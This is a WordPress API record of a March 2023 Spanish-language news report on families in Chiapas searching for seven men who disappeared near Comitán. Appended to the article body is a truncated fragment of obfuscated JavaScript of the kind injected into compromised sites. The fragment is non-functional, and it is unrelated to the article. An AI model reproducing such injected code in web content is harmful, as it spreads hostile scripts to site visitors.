{"id":9203,"date":"2023-03-28T04:36:03","date_gmt":"2023-03-28T04:36:03","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9203"},"modified":"2023-03-28T04:36:03","modified_gmt":"2023-03-28T04:36:03","slug":"continua-la-busqueda-de-los-7-desaparecidos-en-comitan","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9203","title":{"rendered":"Contin\u00faa la b\u00fasqueda de los 7 desaparecidos en Comit\u00e1n"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"405\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/FB_IMG_1679978141127.jpg\" alt=\"\" class=\"wp-image-9204\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/FB_IMG_1679978141127.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/FB_IMG_1679978141127-300x169.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Rodolfo Flores.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 27 de marzo del 2023. Tuxtla Guti\u00e9rrez.- Familiares de los 7 desaparecidos el pasado 22 de marzo en el municipio de Comit\u00e1n, realizaron una marcha en Tuxtla Guti\u00e9rrez para pedir el apoyo de la poblaci\u00f3n y las autoridades para dar con su paradero, pues hasta el momento no se tiene rastro de d\u00f3nde podr\u00edan estar.<\/p>\n\n\n\n<p>Se trata de Reymundo Sandoval C\u00f3rdova, Jos\u00e9 Mar\u00edn Carbajal Ram\u00edrez, Yovani V\u00e1zquez M\u00e9ndez, Jord\u00e1n Gordillo Genov\u00e9s, Luis Ambrocio Gonz\u00e1lez de Le\u00f3n, Hern\u00e1n Aguilar Morales y Axel Vibr\u00e1n Martinez P\u00e9rez quienes desaparecieron de manera misteriosa luego de salir del ejido Nueva Libertad.<\/p>\n\n\n\n<p>De acuerdo con los manifestantes, los hoy desaparecidos son autoridades ejidales en esta comunidad, y \u00fanicamente iban con destino al municipio de Palenque, para actividades recreativas.<\/p>\n\n\n\n<p>Los \u00fanicos datos que se tienen es que, circulaban en el tramo La Trinitaria-Comit\u00e1n, lograron llegar a Comit\u00e1n.<\/p>\n\n\n\n<p>Guillermo Gordillo Genov\u00e9s, hermano de uno de los desaparecidos dijo que: \u201cSalieron de Frontera Comalapa, a las siete de la ma\u00f1ana, se sabe que, pasaron a desayunar a Chamic, lograron pasar la Caseta del SAT y de ah\u00ed no se les pudo contactar, desaparecieron sin dejar rastro, se les escribi\u00f3, se les llam\u00f3 y los celulares fueron apagados\u00b7<\/p>\n\n\n\n<p>Los hombres viajaban en una camioneta Ram de color rojo, y tampoco se ha localizado esta unidad.<\/p>\n\n\n\n<p>\u201cEs por ello que, nosotros pedimos a las autoridades que nos apoyen, no nos importa si fueron llevados por alguien, eso no nos importa, que los regresen eso pedimos\u201d, coment\u00f3.<\/p>\n\n\n\n<p>Los familiares continuar\u00e1n con estas acciones de b\u00fasqueda, hasta dar con el paradero de los 7 desaparecidos.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores. Agencia ReporteCiudadano, 27 de marzo del 2023. Tuxtla Guti\u00e9rrez.- Familiares de los 7 desaparecidos el pasado 22 de marzo en el municipio de Comit\u00e1n, realizaron una marcha en Tuxtla Guti\u00e9rrez para pedir el apoyo de la poblaci\u00f3n y las autoridades para dar con su paradero, pues hasta el momento no se tiene rastro &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9204,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-9203","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9203","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9203"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9203\/revisions"}],"predecessor-version":[{"id":9205,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9203\/revisions\/9205"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9204"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9203"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9203"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9203"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}